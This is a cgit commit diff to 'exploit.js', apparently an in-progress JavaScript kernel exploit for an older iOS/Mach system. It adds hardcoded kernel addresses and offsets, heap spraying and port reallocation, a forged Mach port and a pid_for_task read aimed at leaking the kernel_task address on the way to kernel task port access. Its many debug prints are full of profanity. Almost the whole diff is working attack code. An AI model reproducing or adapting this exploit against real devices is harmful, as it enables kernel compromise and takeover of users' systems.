summaryrefslogtreecommitdiff
path: root/src/js/kexp
diff options
context:
space:
mode:
Diffstat (limited to 'src/js/kexp')
-rwxr-xr-xsrc/js/kexp/exploit.js141
1 files changed, 138 insertions, 3 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 715535d..8447c46 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -30,6 +30,16 @@ var req_init_port_set_address = 0x0;
var req_init_port_set_count = 0x4;
var MACH_RCV_MSG = 0x2;
var MACH_MSG_TIMEOUT_NONE = 0;
+var TASK_BSDINFO_OFFSET = 0x200;
+var BSDINFO_PID_OFFSET = 0x8;
+
+function find_kerneltask() {
+ return 0x8041200c;
+}
+
+function find_ipcspacekernel() {
+ return 0x80456664;
+}
var task_self = 0;
var kslide = 0;
@@ -58,7 +68,6 @@ var SIZEOF_BYTES_MSG = 384;
var PORTS_NUM = 1024;
var PORTS_NUM_PRESPRAY = 100;
var MIG_MAX = 0x1000;
-var NDR_record = 0x36ebf00c;
function spray_data(mem, size, num, portptr) {
var err = shit_heap(4);
@@ -272,6 +281,7 @@ function send_ports(target, payload, num, number_port_descs) {
}
function release_port_ptrs(port) {
+// var req = shit_heap(0x1c + (5 * 0xc) + 0x8);
var req = shit_heap(0x1c + (5 * 0xc) + 0x8);
// printf("%s\n", hexdump(read_buf(req, 0x1c + (5 * 0xc) + 0x8), 8, 2, req, 8, "0"));
var ret = mach_msg(req, MACH_RCV_MSG, 0, (0x1c + (5 * 0xc) + 0x8), port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
@@ -286,6 +296,37 @@ function r3gister(task, init_port_set, real_count, fake_count) {
var InP = mess;
var OutP = mess;
+ /*
+ InP->msgh_body.msgh_descriptor_count = 1;
+ InP->init_port_set.address = (void*)(init_port_set);
+ InP->init_port_set.count = real_count;
+ InP->init_port_set.disposition = 19;
+ InP->init_port_set.deallocate = FALSE;
+ InP->init_port_set.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
+ InP->NDR = NDR_record;
+ InP->init_port_setCnt = fake_count; // was real_count
+ InP->Head.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
+ InP->Head.msgh_remote_port = task;
+ InP->Head.msgh_local_port = mig_get_local_port();
+ InP->Head.msgh_id = 3403;
+ InP->msgh_body.msgh_descriptor_count 0x18 0x4
+ InP->init_port_set.address 0x1c 0x4
+ InP->init_port_set.count 0x20 0x4
+ InP->init_port_set 0x1c
+ InP->NDR 0x28 0x8
+ InP->init_port_setCnt 0x30 0x4
+ InP->Head.msgh_bits 0x0 0x4
+ InP->Head.msgh_remote_port 0x8 0x4
+ InP->Head.msgh_local_port 0xc 0x4
+ InP->Head.msgh_id 0x14 0x4
+0x00000003
+0x00000034 0x0000002c
+0x00000024
+50
+78
+0x0 0x1057ec
+ */
+
write_u32(InP + 0x18, 1);
write_u32(InP + 0x1c, init_port_set);
write_u32(InP + 0x20, real_count);
@@ -305,10 +346,46 @@ function r3gister(task, init_port_set, real_count, fake_count) {
return ret;
}
+function mach_ports_lookup_shit() {
+ printf("fuck\n");
+ var arrz = shit_heap(4);
+ printf("fuck\n");
+ write_u32(arrz, 0);
+ printf("fuck\n");
+ var sz = shit_heap(4);;
+ printf("fuck\n");
+ write_u32(sz, 3);
+ printf("fuck\n");
+// var mts = mach_task_self();
+ printf("fuck\n");
+ calls4arg("mach_ports_lookup", task_self, arrz, sz, 0);
+ printf("mpl success\n");
+
+ return read_u32(read_u32(arrz) + 8);
+}
+
+var kernel_task_addr = 0;
function get_kernel_task() {
var ret = 0;
var tfp0 = 0;
+ /*
+ printf("fuck\n");
+ var arrz = shit_heap(4);
+ printf("fuck\n");
+ write_u32(arrz, 0);
+ printf("fuck\n");
+ var sz = shit_heap(4);;
+ printf("fuck\n");
+ write_u32(sz, 3);
+ printf("fuck\n");
+ var mts = mach_task_self();
+ printf("fuck\n");
+ mach_ports_lookup(mts, arrz, sz);
+ printf("mpl success\n");
+ return;
+*/
+
sanity_port = shit_heap(4);
task_self = mach_task_self();
@@ -351,6 +428,8 @@ function get_kernel_task() {
prepare_ptr(big_buf, big_size, kptr, 256);
prepare_ptr(small_buf, small_size, kptr, 32);
+again: while (true) {
+
var dummy = shit_heap(4);
for (var i = 0; i < PORTS_NUM_PRESPRAY; i++) {
spray(big_buf, big_size, dummy);
@@ -374,13 +453,69 @@ function get_kernel_task() {
var arrmpt = shit_heap(8);
write_u32(arrmpt, 0);
write_u32(arrmpt + 4, 0);
+ mach_ports_lookup_shit();
var ret__ = r3gister(mach_task_self(), arrmpt, 2, 3);
- printf("%d %s", ret__, mach_error_string(ret__));
+ mach_ports_lookup_shit();
+ printf("%d %s\n", ret__, mach_error_string(ret__));
printf("r3gister done\n");
+// while (true) {
+ //
+// }
+ scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
+ printf("fuck\n");
+// var fake_port = read_u32(read_u32(arrz) + 8);
+
+ /*
+ * BEGIN JANK FUCKING HACK
+ */
+ var fake_port = mach_ports_lookup_shit();
+ printf("fuck\n");
+ printf("%x\n", fake_port);
+ printf("fuck\n");
+ // todo: add mach_port_valid stuff
+ printf("fuck\n");
+
+ printf("fuck\n");
+ write_u32(kport + 0x50, kptr + 0x78 - TASK_BSDINFO_OFFSET);
+ printf("fuck\n");
+ write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
+ printf("fuck\n");
+ var tst_str = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0";
+ printf("fuck\n");
+ var tst = _sptr(tst_str);
+ printf("fuck\n");
+ var kpbuf = tst + 4;
+ printf("fuck\n");
-
+ printf("fuck\n");
+ for (var i = 0; i < 2; i++) {
+ printf("fuck\n");
+ write_buf(kpbuf + (i * 0x78), read_buf(kport + (i * 0x78), 0x78), 0x78);
+ }
+ printf("fuck\n");
+ usleep(10000);
+ sched_yield();
+ mach_port_destroy(mach_task_self(), read_u32(fakeportData));
+ spray_data(tst, tst_str.length, 10, fakeportData);
+ printf("fuck\n");
+ printf("done realloc");
+ printf("fuck\n");
+
+ printf("fuck\n");
+ var kernel_task_addr = shit_heap(4);
+ printf("fuck\n");
+ scall("printf", "kernel_task address: 0x%08x\n", read_u32(kernel_task_addr));
+ ret__ = pid_for_task(fake_port, kernel_task_addr);
+ printf("%d %s\n", ret__, mach_error_string(ret__));
+ printf("fuck\n");
+ printf("IF YOU SEE THIS AND IT LOOKS LEGIT, SHIT HAS FUCKING HAPPENED\n");
+ printf("fuck\n");
+ call4arg(sym_cache["puts"], sptr("kernel_task address: 0x" + pad_left(read_u32(kernel_task_addr).toString(16), '0', 8)), 0, 0, 0);
+ scall("printf", "kernel_task address: 0x%08x\n", read_u32(kernel_task_addr));
+ printf("fuck\n");
printf("get lucky\n");
return tfp0;
+ }
}
generated by cgit v1.2.3 (git 2.39.1) at 2025-11-30 21:28:42 +0000